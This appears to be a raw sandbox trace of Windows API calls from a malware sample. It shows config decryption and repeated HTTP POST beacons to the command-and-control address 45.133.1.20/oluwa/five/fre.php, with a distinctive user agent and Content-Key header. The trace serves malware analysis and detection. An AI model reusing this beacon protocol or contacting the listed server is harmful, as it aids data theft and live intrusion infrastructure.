LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.496] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0243.497] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.497] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0243.497] GetProcessHeap () returned 0x6a0000 [0243.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0243.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.498] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.506] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.508] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.508] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.508] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.508] GetProcessHeap () returned 0x6a0000 [0243.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0243.509] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0243.509] GetProcessHeap () returned 0x6a0000 [0243.509] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0243.509] GetProcessHeap () returned 0x6a0000 [0243.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0243.512] GetProcessHeap () returned 0x6a0000 [0243.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0243.513] GetProcessHeap () returned 0x6a0000 [0243.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0243.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.514] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.523] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0243.531] GetProcessHeap () returned 0x6a0000 [0243.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0243.532] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.532] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0243.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.533] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.535] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.535] GetProcessHeap () returned 0x6a0000 [0243.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0243.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.537] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0243.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.538] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0243.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.539] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0243.539] GetProcessHeap () returned 0x6a0000 [0243.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0243.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.540] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0243.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.541] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0243.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.545] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0243.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.546] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0243.546] GetProcessHeap () returned 0x6a0000 [0243.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0243.546] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0243.546] GetProcessHeap () returned 0x6a0000 [0243.546] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0243.546] socket (af=2, type=1, protocol=6) returned 0x7d8 [0243.547] connect (s=0x7d8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0243.571] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0243.572] GetProcessHeap () returned 0x6a0000 [0243.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0243.572] GetProcessHeap () returned 0x6a0000 [0243.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0243.573] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0243.574] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0243.574] GetProcessHeap () returned 0x6a0000 [0243.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4978 [0243.574] GetProcessHeap () returned 0x6a0000 [0243.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0243.576] GetProcessHeap () returned 0x6a0000 [0243.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0243.576] GetProcessHeap () returned 0x6a0000 [0243.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0243.578] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0243.579] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0243.579] GetProcessHeap () returned 0x6a0000 [0243.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0243.579] GetProcessHeap () returned 0x6a0000 [0243.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0243.579] send (s=0x7d8, buf=0x6bd460*, len=242, flags=0) returned 242 [0243.580] send (s=0x7d8, buf=0x6bb998*, len=159, flags=0) returned 159 [0243.580] GetProcessHeap () returned 0x6a0000 [0243.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0243.580] recv (in: s=0x7d8, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0243.688] GetProcessHeap () returned 0x6a0000 [0243.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0243.689] GetProcessHeap () returned 0x6a0000 [0243.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0243.690] GetProcessHeap () returned 0x6a0000 [0243.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4978 | out: hHeap=0x6a0000) returned 1 [0243.690] GetProcessHeap () returned 0x6a0000 [0243.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0243.691] closesocket (s=0x7d8) returned 0 [0243.691] GetProcessHeap () returned 0x6a0000 [0243.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0243.691] GetProcessHeap () returned 0x6a0000 [0243.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0243.692] GetProcessHeap () returned 0x6a0000 [0243.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0243.692] GetProcessHeap () returned 0x6a0000 [0243.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0243.800] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x150c) returned 0x7d8 [0243.802] Sleep (dwMilliseconds=0xea60) [0243.804] GetProcessHeap () returned 0x6a0000 [0243.804] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0243.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.806] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.815] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0243.827] GetProcessHeap () returned 0x6a0000 [0243.827] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0243.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.828] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0243.832] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.832] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.834] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.834] GetProcessHeap () returned 0x6a0000 [0243.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0243.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.836] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0243.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.837] CryptDestroyKey (hKey=0x6ad020) returned 1 [0243.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.838] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0243.838] GetProcessHeap () returned 0x6a0000 [0243.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0243.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.840] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0243.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.844] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0243.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.845] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0243.846] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.847] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0243.847] GetProcessHeap () returned 0x6a0000 [0243.847] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0243.847] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0243.847] GetProcessHeap () returned 0x6a0000 [0243.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0243.848] GetProcessHeap () returned 0x6a0000 [0243.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0243.848] GetProcessHeap () returned 0x6a0000 [0243.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0243.849] GetProcessHeap () returned 0x6a0000 [0243.849] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0243.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.851] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.860] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0243.868] GetProcessHeap () returned 0x6a0000 [0243.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0243.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.869] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0243.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.870] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0243.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.872] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0243.872] GetProcessHeap () returned 0x6a0000 [0243.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0243.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.876] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0243.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.878] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0243.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.879] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0243.879] GetProcessHeap () returned 0x6a0000 [0243.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0243.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.880] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0243.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.882] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0243.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.883] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0243.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0243.884] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0243.884] GetProcessHeap () returned 0x6a0000 [0243.884] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0243.887] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0243.887] GetProcessHeap () returned 0x6a0000 [0243.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0243.887] socket (af=2, type=1, protocol=6) returned 0x7dc [0243.888] connect (s=0x7dc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0243.910] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0243.910] GetProcessHeap () returned 0x6a0000 [0243.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0243.910] GetProcessHeap () returned 0x6a0000 [0243.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0243.911] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0243.913] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0243.913] GetProcessHeap () returned 0x6a0000 [0243.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4738 [0243.913] GetProcessHeap () returned 0x6a0000 [0243.913] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0243.913] GetProcessHeap () returned 0x6a0000 [0243.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0243.913] GetProcessHeap () returned 0x6a0000 [0243.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0243.914] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0243.915] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0243.915] GetProcessHeap () returned 0x6a0000 [0243.915] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0243.915] GetProcessHeap () returned 0x6a0000 [0243.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0243.916] send (s=0x7dc, buf=0x6bd460*, len=242, flags=0) returned 242 [0243.917] send (s=0x7dc, buf=0x6bb998*, len=159, flags=0) returned 159 [0243.917] GetProcessHeap () returned 0x6a0000 [0243.917] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0243.917] recv (in: s=0x7dc, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0244.018] GetProcessHeap () returned 0x6a0000 [0244.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0244.019] GetProcessHeap () returned 0x6a0000 [0244.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0244.020] GetProcessHeap () returned 0x6a0000 [0244.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4738 | out: hHeap=0x6a0000) returned 1 [0244.023] GetProcessHeap () returned 0x6a0000 [0244.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0244.024] closesocket (s=0x7dc) returned 0 [0244.168] GetProcessHeap () returned 0x6a0000 [0244.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0244.168] GetProcessHeap () returned 0x6a0000 [0244.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0244.169] GetProcessHeap () returned 0x6a0000 [0244.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0244.169] GetProcessHeap () returned 0x6a0000 [0244.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0244.180] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1510) returned 0x7dc [0244.186] Sleep (dwMilliseconds=0xea60) [0244.188] GetProcessHeap () returned 0x6a0000 [0244.188] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0244.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.189] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.213] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0244.227] GetProcessHeap () returned 0x6a0000 [0244.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0244.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.228] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0244.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.230] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.231] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.232] GetProcessHeap () returned 0x6a0000 [0244.232] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0244.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.233] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0244.234] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.234] CryptDestroyKey (hKey=0x6ad020) returned 1 [0244.235] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0244.238] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0244.238] GetProcessHeap () returned 0x6a0000 [0244.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0244.239] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.239] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0244.240] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0244.241] StrStrA 